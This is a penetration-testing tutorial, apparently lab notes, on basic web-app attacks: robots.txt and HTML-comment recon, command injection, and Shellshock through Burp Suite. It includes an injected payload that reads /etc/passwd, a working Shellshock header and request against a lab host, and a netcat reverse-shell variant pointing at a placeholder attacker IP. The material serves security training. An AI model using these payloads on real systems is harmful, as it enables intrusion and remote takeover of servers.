Web App Basic

Web App Basic Methodology

Make an account
Make a 2nd account
Examine both - is there any difference between them?
Manually Spider
Directory traversal
Command injection
Look for XSS in Form Fields & URL
SQL Injection
Steal cookies, then insert them as the other user
Upload files - where are they saved?
DirBuster

robots.txt

The robots.txt file is used to tell web spiders how to crawl a website. To avoid having confidential information indexed and searchable, webmasters often use this file to tell spiders to avoid specific pages. This is done using the keyword Disallow. As an attacker, it's always a good idea to check the content of the robots.txt file and visit all the pages that are "disallowed" to find sensitive information.
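This check is easy to script. A minimal sketch, using a local sample file in place of a live target (against a real host you would fetch the file with something like `curl -s http://target.example/robots.txt`; the host is a placeholder):

```shell
# Sample robots.txt content (stands in for a fetched file).
cat > /tmp/robots.txt <<'EOF'
User-agent: *
Disallow: /admin/
Disallow: /backup/
EOF

# List the "disallowed" paths -- each one is worth visiting manually.
grep -i '^Disallow:' /tmp/robots.txt | awk '{print $2}'
```

This prints /admin/ and /backup/, the paths the webmaster did not want indexed.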

HTML comments

HTML comments are often used to hide parts of the application, either for "security" reasons or because a page or functionality has been removed from the website. You can easily access the source code of a page using the developer tools in Chrome or Firefox, then search for comments in the HTML code. Comments start with <!-- and end with -->. If you find a link in a comment, it's always worth visiting it.
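Grepping the saved page source is a quick way to hunt for comments at scale. A small sketch on a made-up sample page (on a live target you would first save the source, e.g. `curl -s http://target.example/ > /tmp/page.html`):

```shell
# Sample page source (stands in for a fetched page).
cat > /tmp/page.html <<'EOF'
<html><body>
<!-- TODO: remove the link to /old-admin before launch -->
<p>Hello</p>
</body></html>
EOF

# Extract single-line HTML comments -- hidden links and notes often live here.
grep -o '<!--.*-->' /tmp/page.html
```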

Command injection

Command injection can be used to run arbitrary commands on a server. Multiple payloads can be used to trigger this behaviour. For example, let’s say that the initial command is:

ping [parameter]

Where [parameter] is the value you provided in the form or in the URL.

If you look at how the command line works, you will find that there are multiple ways to chain additional commands:

command1 && command2 that will run command2 if command1 succeeds.
command1 || command2 that will run command2 if command1 fails.
command1 ; command2 that will run command1 then command2.
command1 | command2 that will run command1 and send the output of command1 to command2.
...
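These separators behave the same in any POSIX shell, so you can demonstrate them locally (here true and false stand in for command1):

```shell
true  && echo "&&: runs only after success"
false || echo "||: runs only after failure"
echo "first" ; echo "second"      # ;  -- both always run
echo "hello" | tr 'a-z' 'A-Z'     # |  -- output feeds the next command
```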

In this application, we can provide a parameter to command1, but there is no command2. What we are going to do is add our own command. Instead of sending the [parameter] to the command:

ping 127.0.0.1

Here 127.0.0.1 is our [parameter]. Instead, we are going to send a malicious [parameter] that contains another command:

ping 127.0.0.1 ; cat /etc/passwd

The application will think that 127.0.0.1 ; cat /etc/passwd is just a parameter to run command1. But we actually injected command2: cat /etc/passwd.
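A safe way to see this locally is to simulate the vulnerable pattern; in this sketch echo stands in for ping so nothing touches the network, and the handler shown is hypothetical, not the target's real code:

```shell
# Attacker-controlled value: a legitimate parameter plus an injected command.
param='127.0.0.1 ; echo INJECTED'

# The application only intended to run: ping 127.0.0.1
# Because the parameter is pasted into the command line unescaped,
# the shell sees two commands and runs both.
sh -c "echo pinging $param"
```

This prints "pinging 127.0.0.1" followed by "INJECTED" -- the second line is the output of the injected command.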

Shellshock - via Burp Suite

Proxy the request, then send /cgi-bin/status to the Repeater tab.

In the User-Agent field, delete the content and add the following:
() { :;}; /usr/local/bin/score 24dd5fc5-bdd2-4d20-9b14-cf4ba32dfa24

Note - in a real-world scenario, we would be looking for a reverse shell back, so the above payload would be: () { :;}; /usr/bin/nc 192.168.x.x 443 -e /bin/sh

GET /cgi-bin/status HTTP/1.1
Host: ptl-972d9262-8a657ffb.libcurl.so
User-Agent: () { :;}; /usr/local/bin/score 24dd5fc5-bdd2-4d20-9b14-cf4ba32dfa24
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://ptl-972d9262-8a657ffb.libcurl.so/
Connection: close
Cache-Control: max-age=0
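The same request can be replayed outside Burp with curl. The host and score command are the lab values from the request above, so swap in your own target; the trailing `|| echo` only keeps the sketch from aborting if the lab is offline:

```shell
# Shellshock trigger: the "() { :;};" magic bytes followed by the
# command a vulnerable bash will execute when parsing the variable.
UA='() { :;}; /usr/local/bin/score 24dd5fc5-bdd2-4d20-9b14-cf4ba32dfa24'

curl -s --max-time 10 \
  -H "User-Agent: $UA" \
  http://ptl-972d9262-8a657ffb.libcurl.so/cgi-bin/status \
  || echo "request failed (target offline?)"
```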